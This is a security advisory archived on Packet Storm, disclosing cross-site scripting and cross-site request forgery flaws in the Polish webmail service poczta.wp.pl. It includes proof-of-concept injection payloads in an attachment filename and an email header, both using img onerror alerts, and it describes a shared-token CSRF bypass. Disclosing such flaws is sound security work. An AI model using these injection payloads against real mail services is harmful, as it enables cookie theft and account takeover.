exploit the possibilities

Wirtualna Polska S.A. (WP) XSS / CSRF

Wirtualna Polska S.A. (WP) XSS / CSRF
Posted Dec 4, 2012
Authored by Jakub Zoczek

Wirtualna Polska S.A. (WP) suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | c7aa22c81deed635329a459cba9795b0

Wirtualna Polska S.A. (WP) XSS / CSRF

Change Mirror Download
Poczta.WP Multiple vulnerabilities full disclosure security paper
Author: Jakub Zoczek [zoczus(x)gmail.com]


0x01 Intro
----------
Wirtualna Polska S.A. (WP) is one of the largest Polish web portals.
Their email service (poczta.wp.pl) is affected by multiple cross-site
scripting vulnerabilities and also one, almost fixed cross-site
request forgery bug. After long time of waiting - I got a
non-professional answer from Customer Service Manager of WP, so I
decided to post all my research here. Thus...

0x02 XSS in mail attachments.
----------
Reported: 10/10/2012
State: Fixed

Proof Of Concept:

For example - jpeg picture with filename:

sowa oraz "> inject <img src="boom.jpg"
onerror="alert(document.cookie);"> hhh.jpg

..sent as e-mail attachment.

Result:

http://q-x.ath.cx/~zoczus/poc/wp/wpxss1.png

0x03 XSRF in AntyHack and AntySpam fitler (adding to white list)
----------

Reported: 24/11/2012
State: "Fixed"

Proof Of Concept:

http://q-x.ath.cx/~zoczus/poc/wp/wp-xsrf.txt

Result:

http://q-x.ath.cx/~zoczus/poc/wp/xsrf-wp1.jpg
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-wp2.jpg

0x04 XSRF in AntyHack and AntySpam fitler - bypassing 'fix' ;)
----------

Reported: 04/12/2012
State: Not fixed

Proof Of Concept:
Additional info for 0x03 - as I supposed, WP used the token in a white
list form (every once in a while generated md5 of something). The
problem is, that the token value is probably the same for each user.
For different mail accounts, different browsers, different IP
addresses - token is the same... Bypassing this protection seems to
be quite simple.

http://q-x.ath.cx/~zoczus/poc/wp/xsrf-bypass1.png
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-bypass2.png

0x05 XSS in mail headers
----------

Reported: 04/12/2012
State: Not fixed

Proof Of Concept:

Return-Path: <zoczus@fbi.pl>
Delivered-To: zoczus@wp.pl (zoczus)
Received: (wp-smtpd mx.wp.pl 10088 invoked from network); 30 Nov 2012
16:04:58 +0100
Received: from emkei.cz ([46.167.245.118])
(envelope-sender <zoczus@fbi.pl>)
by mx.wp.pl (WP-SMTPD) with SMTP
for <zoczus@wp.pl>; 30 Nov 2012 16:04:58 +0100
Received: by emkei.cz (Postfix, from userid 33)
id D4119D5807; Fri, 30 Nov 2012 16:04:57 +0100 (CET)
To: zoczus@wp.pl
Subject:
From: "zoczus@fbi.pl" <zoczus@fbi.pl>
Head<img/src="a"/onerror="alert(document.location)">er: dont have spaces
X-Priority: 3 (Normal)
Importance: Normal
Errors-To: zoczus@fbi.pl
Reply-To: zoczus@fbi.pl
Content-Type: text/plain; charset=utf-8
Message-Id: <20121130150457.D4119D5807@emkei.cz>
Date: Fri, 30 Nov 2012 16:04:57 +0100 (CET)
X-WP-DKIM-Status: no signature (id: n/a)
X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A.
X-WP-SPAM: NO (UW) 0000010 [8Wph]

Dobre!

Result:

http://q-x.ath.cx/~zoczus/poc/wp/wp-xss2.png


0x06 The end. :)

----
Best regards,
Jakub Zoczek


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close